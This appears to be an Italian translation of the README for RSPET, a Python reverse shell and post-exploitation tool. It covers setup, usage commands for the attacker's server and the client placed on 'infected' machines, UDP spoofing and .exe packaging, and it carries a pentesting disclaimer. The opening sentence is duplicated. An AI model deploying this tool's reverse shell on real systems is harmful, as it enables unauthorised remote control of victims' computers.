
RSPET (Reverse Shell and Post Exploitation Tool) è un reverse shell basato su Python dotato di funzionalità che assistono in uno scenario di post-exploitation.
RSPET (Reverse Shell and Post Exploitation Tool) è una reverse shell basata su Python dotata di funzionalità che aiutano in scenari di post-sfruttamento.
DISCLAIMER: Questo software è fornito per scopi educativi e di PenTesting e come prova di concetto. Gli sviluppatori non approvano, incitano o supportano in alcun modo l'accesso non autorizzato a computer e interruzioni di reti.
NOTA: La cartella min è stata rimossa. Il sovraccarico aggiuntivo del mantenimento di due versioni ha portato min a non ricevere correzioni di bug e aggiornamenti importanti. Se c'è interesse, sia nell'uso che nel mantenimento, per una versione più snella e semplice, verrà creato un nuovo ramo per ospitarla.
Versione corrente: v0.3.1
Segui @TheRSPET su Twitter per aggiornamenti.
Documentazione: rspet.readthedocs.io
*[1]L'idea per lo XOR così come lo scheletro del client proviene da primalsecurity.net quindi se ti piacciono questi script probabilmente amerai quello che fanno
*[2]Lo spoofing UDP utilizza RAW_SOCKETS, quindi per utilizzarlo, il client deve essere eseguito su un sistema operativo che supporti RAW_SOCKETS (la maggior parte dei sistemi Unix) e con privilegi di root. Infine, la maggior parte degli ISP ha implementazioni in atto che elimineranno o ristruttureranno i pacchetti spoofati
*[3]Controlla di nuovo il perfetto blog post di primalsecurity.net sulla produzione di un .exe
*[4]Documentazione dettagliata sulla creazione di plugin disponibile nella Documentazione Online!
rspet_server.py si trova sulla macchina dell'attaccante ed è in esecuzione per accettare connessionirspet_client.py si trova sulla macchina(i) infetta(e) e avvierà la connessione e attenderà input.Eseguendo ./setup.py mentre ci si trova nella cartella radice del progetto, verranno generati i certificati richiesti e installati tutti i componenti necessari tramite pip.
Naturalmente puoi installare manualmente i pacchetti pip richiesti eseguendo pip2 install Flask flask-cors.
Inoltre puoi generare il tuo set di chiave-certificato (basta nominarli server.key e server.crt e posizionarli all'interno della cartella Server).
python rspet_server.py [-c #clients, --ip ipToBind, -p portToBind]
max_connections predefinito a 5 se lasciato vuoto
API RESTful:
python rspet_server_api.py [-c #clients, --ip ipToBind, -p portToBind]
Client:
python rspet_client.py <server_ip> [server_port]
Molte modifiche possono essere apportate per adattarsi alle esigenze individuali.
Come sempre, se hai suggerimenti, segnalazioni di bug o reclami, sentiti libero di contattarmi.
Un elenco di distribuzioni che contengono RSPET
List_HostsQuesto progetto segue la Guida di stile Python di Google con una piccola variazione sull'uso degli spazi bianchi per allineare i token ":".
Questo progetto è aperto ai contributori. Se hai implementato una nuova funzionalità, o un miglioramento al codice attuale, sentiti libero di aprire una pull request. Se vuoi suggerire una nuova funzionalità, apri un problema. Inoltre, sono necessari tester per eseguire alcuni scenari standard (e forse alcuni propri) per ridurre la possibilità che un bug si insinui in una nuova versione. Se c'è interesse per i test, verrà creato un ramo beta (dove verrà caricato il codice da testare) insieme a un elenco di scenari. Per una guida completa sulle opportunità di contributo e guide, consulta il capitolo "Contributing" nella documentazione online di RSPET
dzervas -- Codice (riprogettazione OO del server, implementazione del sistema di plugin del server, segnalazioni di bug, correzioni di bug)
MIT
i.
.7.
.. :v
c: .x
i.::
:
..i..
#MMMMM
QM AM
9M zM
6M AM
2M 2MX#MM@1.
0M tMMMMMMMMMM;
.X#MMMM ;MMMMMMMMMMMMv
cEMMMMMMMMMU7@MMMMMMMMMMMMM@
.n@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMM@@#$BWWB#@@#$WWWQQQWWWWB#@MM.
MM ;M.
$M EM
WMO$@@@@@@@@@@@@@@@@@@@@@@@@@@@@#OMM
#M cM
QM tM
MM CMO
.MMMM oMMMt
1MO 6MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM iMM
.M1 BM VM ,Mt
1M @M .............................. WM M6
MM .A8OQWWWWWWWWWWWWWWWWWWWWWWWWWWW0Az2 #M
MM MM.
@MMY vMME
UMMMbi i8MMMt
C@MMMMMbt;;i.......i;XQMMMMMMt
;ZMMMMMMMMMMMMMMM@A;.
La torta è una bugia. Ma è passato un anno :)